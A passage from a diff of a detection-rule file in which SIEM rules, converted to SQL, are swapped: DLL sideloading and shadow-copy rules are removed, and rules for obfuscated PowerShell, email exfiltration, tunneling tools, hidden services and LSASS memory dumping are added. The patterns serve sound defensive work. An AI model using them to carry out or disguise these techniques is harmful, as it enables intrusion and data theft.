Emulator\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\Gadget.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Windows Media Player\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\hcc.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\HTML Help Workshop\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\hkcmd.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SysNative\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SysWow64\\\\%' ESCAPE '\\')))) OR 
(NewProcessName LIKE '%\\\\Mc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AntiMalware\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\msseces.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Security Center\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft Security Essentials\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\OInfoP11.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Common Files\\\\Microsoft Shared\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\OleView.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\rc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.NET\\\\%' ESCAPE '\\')))))" ], - "filename": "image_load_side_load_office_dlls.yml" + "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml" }, { - "title": "Suspicious Volume Shadow Copy Vsstrace.dll Load", - "id": "48bfd177-7cf2-412b-ad77-baf923489e82", + "title": "PowerShell Base64 Encoded WMI Classes", + "id": "1816994b-42e1-4fb1-afd2-134d88184f71", "status": "experimental", - 
"description": "Detects the image load of VSS DLL by uncommon executables", - "author": "frack113", + "description": "Detects calls to base64 encoded WMI class such as \"Win32_Shadowcopy\", \"Win32_ScheduledJob\", etc.", + "author": "Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2hhZG93Y29we%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NoYWRvd2NvcH%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TaGFkb3djb3B5%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA%' ESCAPE '\\' OR 
CommandLine LIKE '%XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2NoZWR1bGVkSm9i%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NjaGVkdWxlZEpvY%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TY2hlZHVsZWRKb2%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfUHJvY2Vzc%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1Byb2Nlc3%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Qcm9jZXNz%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfVXNlckFjY291bn%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1VzZXJBY2NvdW50%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Vc2VyQWNjb3Vud%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfTG9nZ2VkT25Vc2Vy%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX0xvZ2dlZE9uVXNlc%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Mb2dnZWRPblVzZX%' ESCAPE '\\')))" ], - "filename": "image_load_dll_vsstrace_susp_load.yml" + "filename": "proc_creation_win_powershell_base64_wmi_classes.yml" }, { - "title": "Pingback Backdoor DLL Loading Activity", - "id": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", - "status": "experimental", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Potential PowerShell Obfuscation Via Reversed Commands", + "id": 
"b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", + "status": "test", + "description": "Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdtc.exe' ESCAPE '\\' AND ImageLoaded LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%hctac%' ESCAPE '\\' OR CommandLine LIKE '%kaerb%' ESCAPE '\\' OR CommandLine LIKE '%dnammoc%' ESCAPE '\\' OR CommandLine LIKE '%ekovn%' ESCAPE '\\' OR CommandLine LIKE '%eliFd%' ESCAPE '\\' OR CommandLine LIKE '%rahc%' ESCAPE '\\' OR CommandLine LIKE '%etirw%' ESCAPE '\\' OR CommandLine LIKE '%golon%' ESCAPE '\\' OR CommandLine LIKE '%tninon%' ESCAPE '\\' OR CommandLine LIKE '%eddih%' ESCAPE '\\' OR CommandLine LIKE '%tpircS%' ESCAPE '\\' OR CommandLine LIKE '%ssecorp%' ESCAPE '\\' OR CommandLine LIKE '%llehsrewop%' ESCAPE '\\' OR CommandLine LIKE '%esnopser%' ESCAPE '\\' OR CommandLine LIKE '%daolnwod%' ESCAPE '\\' OR CommandLine LIKE '%tneilCbeW%' ESCAPE '\\' OR CommandLine LIKE '%tneilc%' ESCAPE '\\' OR CommandLine LIKE '%ptth%' ESCAPE '\\' OR CommandLine LIKE '%elifotevas%' ESCAPE '\\' OR CommandLine LIKE '%46esab%' ESCAPE '\\' OR CommandLine LIKE '%htaPpmeTteG%' ESCAPE '\\' OR CommandLine LIKE '%tcejbO%' ESCAPE '\\' OR CommandLine LIKE '%maerts%' ESCAPE '\\' OR CommandLine LIKE '%hcaerof%' ESCAPE '\\' OR CommandLine LIKE '%retupmoc%' ESCAPE '\\')) AND NOT 
((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\' AND CommandLine LIKE '%rahc%' ESCAPE '\\')))" ], - "filename": "image_load_malware_pingback_backdoor.yml" + "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml" }, { - "title": "WMI Persistence - Command Line Event Consumer", - "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", - "status": "test", - "description": "Detects WMI command line event consumers", - "author": "Thomas Patzke", + "title": "Email Exifiltration Via Powershell", + "id": "312d0384-401c-4b8b-abdf-685ffba9a332", + "status": "experimental", + "description": "Detects email exfiltration via powershell cmdlets", + "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", "tags": [ - "attack.t1546.003", - "attack.persistence" + "attack.exfiltration" ], "falsepositives": [ - "Unknown (data set is too small; further testing needed)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbemcons.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND CommandLine LIKE '%Get-Recipient%' ESCAPE '\\' AND CommandLine LIKE '%-ExpandProperty%' ESCAPE '\\' AND CommandLine LIKE '%EmailAddresses%' ESCAPE '\\' AND CommandLine LIKE '%SmtpAddress%' ESCAPE '\\' AND CommandLine LIKE '%-hidetableheaders%' ESCAPE '\\')" ], - "filename": "image_load_wmi_persistence_commandline_event_consumer.yml" + "filename": "proc_creation_win_powershell_email_exfil.yml" }, { - "title": "VBA DLL Loaded Via Office Application", - "id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", + "title": "Network Reconnaissance Activity", + "id": 
"e6313acd-208c-44fc-a0ff-db85d572e90e", "status": "test", - "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", - "author": "Antonlovesdnb", + "description": "Detects a set of suspicious network related commands often used in recon stages", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.discovery", + "attack.t1087", + "attack.t1082", + "car.2016-03-001" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\VBE7.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBEUI.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBE7INTL.DLL' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%nslookup%' ESCAPE '\\' AND CommandLine LIKE '%\\_ldap.\\_tcp.dc.\\_msdcs.%' ESCAPE '\\')" ], - "filename": "image_load_office_vbadll_load.yml" + "filename": "proc_creation_win_nslookup_domain_discovery.yml" }, { - "title": "Suspicious Volume Shadow Copy Vssapi.dll Load", - "id": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", + "title": "Abuse of Service Permissions to Hide Services Via Set-Service", + "id": "514e4c3a-c77d-4cde-a00f-046425e2301e", "status": "experimental", - "description": "Detects the image load of VSS DLL by uncommon executables", - "author": "frack113", + "description": "Detects usage of the \"Set-Service\" 
powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Rare intended use of hidden services" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\'))" ], - "filename": "image_load_dll_vssapi_susp_load.yml" + "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml" }, { - "title": "Potential DLL Sideloading Via VMware Xfer", - "id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", + "title": "PUA - NPS Tunneling Tool Execution", + "id": "68d37776-61db-42f5-bf54-27e87072d17e", "status": "experimental", - "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to 
sideload arbitrary DLL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\glib-2.0.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\npc.exe' ESCAPE '\\' OR (CommandLine LIKE '% -server=%' ESCAPE '\\' AND CommandLine LIKE '% -vkey=%' ESCAPE '\\' AND CommandLine LIKE '% -password=%' ESCAPE '\\') OR CommandLine LIKE '% -config=npc%' ESCAPE '\\' OR ((Hashes LIKE '%MD5=AE8ACF66BFE3A44148964048B826D005%' ESCAPE '\\' OR Hashes LIKE '%SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856%' ESCAPE '\\') OR md5 = 'ae8acf66bfe3a44148964048b826d005' OR sha1 = 'cea49e9b9b67f3a13ad0be1c2655293ea3c18181' OR sha256 = '5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856')))" ], - "filename": "image_load_side_load_vmware_xfer.yml" + "filename": "proc_creation_win_pua_nps.yml" }, { - "title": "Aruba Network Service Potential DLL Sideloading", - "id": "90ae0469-0cee-4509-b67f-e5efcef040f7", + "title": "Wusa Extracting Cab Files From Suspicious Paths", + "id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", "status": "experimental", - "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", + "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone 
Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\arubanetsvc.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcr100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpapi.dll' ESCAPE '\\')) AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": 
"image_load_side_load_aruba_networks_virtual_intranet_access.yml" + "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" }, { - "title": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", - "id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", + "title": "Potential PowerShell Obfuscation Via WCHAR", + "id": "e312efd0-35a1-407f-8439-b8d434b438a6", "status": "test", - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "description": "Detects suspicious encoded character syntax often used for defense evasion", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND Signed = 'false')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%(WCHAR)0x%' ESCAPE '\\')" ], - "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml" + "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml" }, { - "title": "DLL Load By System Process From Suspicious Locations", - "id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", + "title": "Potential Signing Bypass Via Windows Developer Features", + "id": "a383dec4-deec-4e6e-913b-ed9249670848", "status": "experimental", - "description": "Detects when a system process (ie located in system32, syswow64...etc) loads a DLL from a 
suspicious location such as %temp%", + "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\setup.exe%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SystemSettingsAdminFlows.exe' ESCAPE '\\' OR OriginalFileName = 'SystemSettingsAdminFlows.EXE') AND CommandLine LIKE '%TurnOnDeveloperFeatures%' ESCAPE '\\' AND (CommandLine LIKE '%DeveloperUnlock%' ESCAPE '\\' OR CommandLine LIKE '%EnableSideloading%' ESCAPE '\\'))" ], - "filename": "image_load_susp_dll_load_system_process.yml" + 
"filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" }, { - "title": "Wmiprvse Wbemcomn DLL Hijack", - "id": "7707a579-e0d8-4886-a853-ce47e4575aaa", + "title": "Execution via WorkFolders.exe", + "id": "0bbc6369-43e3-453d-9944-cae58821c173", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", + "author": "Maxime Thiebaut (@0xThiebaut)", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the uncommon Windows Work Folders feature." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\WorkFolders.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\'))" ], - "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "proc_creation_win_susp_workfolders.yml" }, { - "title": "Suspicious Volume Shadow Copy VSS_PS.dll Load", - "id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", - "status": "experimental", - "description": "Detects the image load of vss_ps.dll by uncommon executables", - "author": "Markus Neis, @markus_neis", + "title": "Suspicious Plink Port Forwarding", + "id": "48a61b29-389f-4032-b317-b30de6b95314", + "status": "test", + "description": "Detects suspicious Plink tunnel port forwarding to a local port", + "author": "Florian Roth 
(Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Unknown" + "Administrative activity using a remote port forwarding to a local port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vss\\_ps.dll' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\clussvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dismhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\inetsrv\\\\appcmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\searchindexer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\srtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tiworker.exe' ESCAPE '\\' OR 